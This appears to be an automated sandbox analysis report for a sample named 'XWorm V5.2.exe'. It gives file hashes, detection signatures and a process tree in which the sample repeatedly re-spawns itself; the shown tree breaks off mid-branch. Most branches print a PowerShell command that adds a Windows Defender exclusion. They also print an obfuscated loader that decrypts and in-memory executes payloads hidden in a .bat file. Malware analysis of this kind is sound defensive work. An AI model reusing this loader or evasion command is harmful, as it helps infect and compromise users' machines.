Analysis

  • max time kernel
    359s
  • max time network
    360s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    05-09-2024 00:10

General

  • Target

    XWorm V5.2.exe

  • Size

    18.2MB

  • MD5

    bdc4539e8060d4db24a69db716a1cec0

  • SHA1

    71c2485bf1684e73f16a213568efcaa2cb88ce6f

  • SHA256

    c39cc9aaa0311fd1f6d981e995b608b0d36e464aea09896bd17b41bbd3fc1fe6

  • SHA512

    b2411923cf5c2e4f96682f73234c409eca38b1712413ec946b1d652a4ddc266376eebe02fd6878dc3fc379eff1307f09407bc06db576c462ded08a839087eb4f

  • SSDEEP

    393216:s+gzSUAx9phaAUnQeGUPG/uVeZ/K2B1CkcDUDLHK18as0mcvow+Ax:1CwUAQQLIG/5//CFU/qO0T

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
    "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2820
    • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
      "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2596
      • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
        "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2604
        • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
          "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1120
          • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
            "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2488
            • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
              "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
              6⤵
                PID:1412
                • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
                  "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
                  7⤵
                    PID:2940
                    • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
                      "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
                      8⤵
                        PID:2276
                        • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
                          "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
                          9⤵
                            PID:2284
                            • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
                              "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
                              10⤵
                                PID:1228
                                • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
                                  "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
                                  11⤵
                                    PID:1032
                                    • C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe
                                      "C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"
                                      12⤵
                                        PID:328
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                        12⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2508
                                      • C:\Windows\system32\cmd.exe
                                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                        12⤵
                                          PID:2760
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                            13⤵
                                              PID:2780
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                              13⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2592
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                          11⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1628
                                        • C:\Windows\system32\cmd.exe
                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                          11⤵
                                            PID:1532
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                              12⤵
                                                PID:2388
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                12⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2472
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                            10⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2764
                                          • C:\Windows\system32\cmd.exe
                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                            10⤵
                                              PID:2460
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                11⤵
                                                  PID:1952
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                  11⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2464
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                              9⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2092
                                            • C:\Windows\system32\cmd.exe
                                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                              9⤵
                                                PID:1804
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                  10⤵
                                                    PID:2340
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                    10⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1660
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                                8⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2364
                                              • C:\Windows\system32\cmd.exe
                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                                8⤵
                                                  PID:2912
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                    9⤵
                                                      PID:2744
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                      9⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2692
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                                  7⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2040
                                                • C:\Windows\system32\cmd.exe
                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                                  7⤵
                                                    PID:1828
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                      8⤵
                                                        PID:2804
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                        8⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2400
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                                    6⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:948
                                                  • C:\Windows\system32\cmd.exe
                                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                                    6⤵
                                                      PID:1060
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                        7⤵
                                                          PID:1712
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                          7⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1704
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                                      5⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2328
                                                    • C:\Windows\system32\cmd.exe
                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                                      5⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:1288
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                        6⤵
                                                          PID:1716
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                                                          6⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:868
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'
                                                      4⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1728
                                                    • C:\Windows\system32\cmd.exe
                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "
                                                      4⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2056
                                                      • C:\Windows\system32\cmd.exe
